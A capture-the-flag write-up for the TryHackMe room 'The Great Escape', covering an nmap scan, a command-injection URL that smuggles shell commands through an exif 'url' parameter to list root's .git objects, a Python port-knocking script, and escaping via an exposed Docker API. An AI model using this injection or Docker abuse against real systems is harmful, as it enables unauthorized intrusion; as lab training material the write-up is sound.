# TryHackMe-The Great Escape ## NMAP ``` nmap -sC -sV 10.10.108.159 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-15 16:17 PKT Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 16:21 (0:02:05 remaining) Stats: 0:02:13 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 16:22 (0:02:10 remaining) Nmap scan report for 10.10.108.159 Host is up (0.16s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh? | fingerprint-strings: | GenericLines: |_ uT9UNaD!^xFWU'tGL'-@"d2gE"Xd |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) 80/tcp open http nginx 1.19.6 | http-robots.txt: 3 disallowed entries |_/api/ /exif-util /*.bak.txt$ |_http-server-header: nginx/1.19.6 |_http-title: docker-escape-nuxt 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port22-TCP:V=7.80%I=7%D=2/15%Time=602A5867%P=x86_64-pc-linux-gnu%r(Gene SF:ricLines,1F,"uT9UNaD!\^xFWU'tGL\\'-@\"d2gE\"Xd\r\n"); Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 195.11 seconds ``` ## PORT 80 (HTTP) From the nmap scan we see 3 disallowed entries The first entry which is `/api/` gives 503 which we get when a server is currently unable to handle the request due to a temporary overloading or maintenance of the server. The second entry invloves uploading a image file And for the third I didn't know how to access `/\*.bak.txt$` ## Dirsearch For fuzzing I used dirsearch but I was getting a lot of 503 status codes But I did saw `/api/` which was having 301 status code with a length of `169` bytes I also ran `nikto` and it found some cert and archive files but they were also giving 503 errors So there is some WAF (Web Application Firewall) that is implemented that we need to bypass so here automated tools may not work . For the web flag I looked at the hint which said about a "well-known file", I though about robots.txt , the javascript file but it was a dead end so started to guess it and eventually got there It says to make a request with a HEAD Going back to `robots.txt` I tried to combine two disallowed entries and got to somewhere If we focus on this part We can see that it's pointing at `/exif` and has a parameter `url` We can do LFI now , since it's a docker container you can tell as there aren't any usernames so we'll directly go `/root/` directory Reading the `dev-note.txt` So we got the password but not sure if it's for hydra. Visiting the `/root/.git/` folder I used this command to search for files ``` http://10.10.176.126/api/exif?url=http://api-dev-backup:8080/exif?url=;cd%20/root/.git/;pwd;ls%20-la%20objects ``` And found objects which could be recovered using `git show ` ``` a3d30a7d0510dc6565ff9316e3fb84434916dee8 3f5e51190a2c8e2a4ea226e7c004ff656148a168 4530ff7f56b215fa9fe76c4d7cc1319960c4e539 4b825dc642cb6eb9a060e54bf8d69288fbee4904 5242825dfd6b96819f65d17a1c31a99fea4ffb6a 89dcd015496baca7521df9a07de050c37cb3d4ba aae81292b0aeb73d28ce77dd3078470897151cd8 efadf5b5aa6d0b3bd434c0437be8559edef2a52e fc326ab9338571dfeb64c00f4b9d85c09d557828 ``` These were the objects I gathered by going back and forth We get a flag but it was invalid also got some ports to knock .So I did a simple port knock through a tool we can install https://www.howtogeek.com/442733/how-to-use-port-knocking-on-linux-and-why-you-shouldnt/ But this method failed so I looked for scripts on github and found one and modified a little to add some more arguments for ports ``` #!/usr/bin/python import sys from socket import * from itertools import permutations if len(sys.argv) < 5: print "---------------------------------------------" print " Port Knocker " print "Usage: python knock.py " print "Ex: python knock.py 192.168.209.130 1 2 3 " print "---------------------------------------------" sys.exit(0) host = sys.argv[1] ports = permutations([int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4]),int(sys.argv[5]),int(sys.argv[6])]) def Knockports(ports): for port in ports: try: s = socket(AF_INET, SOCK_STREAM) s.settimeout(0.1) s.connect_ex((host, port)) s.close() print "Knocked on port " + str(port) except Exception, e: print "Error: " + str(e) for combination in list(ports): print "Testing permutation: " + str(combination) Knockports(combination) ``` Then ran the python2 script Doing a nmap scan we can see that docker port is open now After that I visited the hacktricks tried to run some commands but wasn't able to do anything and kept failing. But this blog saved me from quiting on this room https://www.hackingarticles.in/docker-for-pentester-abusing-docker-api/ First I tried to view the images then tried connecting to them but since they were not running I used `ps -a` to see which images were running and saw conatiner ID `49fe455a9681` was running so I was able to connect with it But this container didn't had any intersting stuff so connected to another one which was running on port 8080 of that image Then switched to another container Gathering the objects from before I used git cat-file -p This was the second flag Now I tried to look for docker breakouts, exploits,capabilites but nothing seemed to work and I was getting the feeling that this is a huge rabbit hole. So going back to seeing docker images I saw alpine at the bottom and gave a shot to mount it This is box was a lot difficult because there was a prize for this box the one's who completed it within 3 days will be added to the raffle and I completed this box after 2 days so hopefully I'll win a prize with that we can all the flag.